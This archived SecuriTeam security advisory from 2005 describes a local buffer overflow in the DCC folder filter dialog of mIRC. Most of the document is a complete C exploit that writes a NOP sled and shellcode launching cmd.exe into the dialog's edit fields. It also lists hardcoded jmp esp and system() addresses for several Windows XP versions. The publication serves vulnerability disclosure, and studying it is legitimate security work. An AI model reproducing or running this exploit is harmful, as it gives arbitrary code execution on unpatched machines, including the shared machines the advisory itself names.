Network Security: Detailed info on [NT] mIRC Local Buffer Overflow (DDC Filter)

Subject:	[NT] mIRC Local Buffer Overflow (DDC Filter)
Date:	28 Dec 2005 12:00:40 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  mIRC Local Buffer Overflow (DDC Filter)
------------------------------------------------------------------------


SUMMARY

 <http://www.mirc.com/> mIRC is "a friendly IRC client that is well 
equipped with options and tools". By filling a long string in the DDC 
filter field, it is possible to trigger a buffer overflow in mIRC.

DETAILS

Vulnerable Systems:
 * mIRC 6.16,6.12,6.03 and 5.91

When adding/editing filters to locate the specified folder for the files 
transfered by DCC (Tools >> Options >> DCC >> Folders), it is possible to 
trigger a buffer overflow if the string used is greater or equal to 981 
bytes. The application crash showing an memory error 0x0000.

The address in the exception shows the value of the second edit field 
(0x0000 if it's empty). If we write AAAA in this field, the error it's 
0x41414141, overwrite the eip and we can take the control and execute 
arbitrary code.

At first look executing a shellcode appears to be difficult, since we only 
can write 39 chars in the second edit box. This problem can be overcome by 
filling: jmp esp + sub esp 0x74 + jmp esp. Using this method, the EIP it's 
overwritten by the text in the first edit field, and in this allows 980 
bytes for the shellcode.

The code executed are with current user privileges, anyway this bug could 
be especially dangerous in universities, cybercafes, schools and any 
location where user oriented restrictions/logon are enforced.

Exploit Code:
/*
mIRCexploitXPSP1esp.c
Vulnerabilidad testeada en Windpws XP SP1,SP2 Spanish
y windows XP SP2 English

Esta PoC es para XP SP1 Spanish.

Para XP SP2 Spanish:

system: 0x77bf93c7
jmp esp: 0x77E37BBB (advapi32.dll)

Para XP SP2 English:

System: 0x77c293c7
jmp esp: 0x77E5D1D6

Gracias especiales a rojodos (muy bueno tu tutorial),
jocanor, otromasf, crazyking y gandalfj.
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main () {
HWND lHandle, lHandledit, lHandledit2;
char strClass[30];
char shellcode[999]=
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x55"
   "\x8B\xEC"
   "\x33\xFF"
   "\x57"
   "\x83\xEC\x04"
   "\xC6\x45\xF8\x63"
   "\xC6\x45\xF9\x6D"
   "\xC6\x45\xFA\x64"
   "\xC6\x45\xFB\x2E"
   "\xC6\x45\xFC\x65"
   "\xC6\x45\xFD\x78"
   "\xC6\x45\xFE\x65"
   "\x8D\x45\xF8"
   "\x50"
   "\xBB\x44\x80\xbf\x77"
   "\xFF\xD3"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90";

  //Shellcode system("cmd.exe"), system in \x44\x80\xbf\x77 0x77bf8044 
(WinXP Sp1 Spanish)

char saltaoffset[]="\xBB\x9B\xE2\x77\x90\x90\x90\x90\x90" 
"\x83\xEC\x74\xFF\xE4\x90\x90"; // jmp esp 0x77E29BBB (advapi32.dll) , sub 
esp 0x74, jmp esp

lHandle=FindWindow(NULL, "DCC Get Folder");

if (!lHandle)
{
    printf("\nCan't find mIRC DCC Get Folder Dialog :\nIn mIRC 
Options/DCC/Folders push ADD\n");
    return 0;
}
else
{  printf("handle for mIRC DCC Get Folder Dialog : 0x%X\n",lHandle); }

SetForegroundWindow(lHandle);
lHandledit = FindWindowEx(lHandle, 0, "Edit", 0);
printf("handle for First Edit : 0x%X\n",lHandledit);
printf("ASCII Shellcode in first edit : %s\n", shellcode);
SendMessage(lHandledit, WM_SETTEXT,0,(LPARAM)shellcode);


lHandledit2 = GetWindow(lHandledit, GW_HWNDNEXT);
GetClassName(lHandledit2, strClass, sizeof(strClass));

while ( lstrcmp(strClass,"Edit") )
 {
 lHandledit2 = GetWindow(lHandledit2, GW_HWNDNEXT);
 GetClassName(lHandledit2, strClass, sizeof(strClass));
 }

printf("handle for Second Edit : 0x%X\n",lHandledit2);
Sleep(500);
printf("ASCII Shellcode in second edit : %s\n", saltaoffset);
SendMessage(lHandledit2, WM_SETTEXT,0,(LPARAM)saltaoffset);
Sleep(500);
SendMessage (lHandledit2, WM_IME_KEYDOWN, VK_RETURN, 0);
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:crowdat@gmail.com> Crowdat 
Kurobudetsu.
The original article can be found at:  
<http://www.shellsec.net/leer_advisory.php?id=9> 
http://www.shellsec.net/leer_advisory.php?id=9



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
<Prev in Thread]	Current Thread	[Next in Thread>
[NT] mIRC Local Buffer Overflow (DDC Filter), SecuriTeam <=
Previous by Date:	[UNIX] Perl Format String Integer Wrap, SecuriTeam
Next by Date:	[NT] Microsoft Internet Explorer Keyboard Shortcut Processing, SecuriTeam
Previous by Thread:	[UNIX] Perl Format String Integer Wrap, SecuriTeam
Next by Thread:	[NT] Microsoft Internet Explorer Keyboard Shortcut Processing, SecuriTeam
Indexes:	[Date] [Thread] [Top] [All Lists]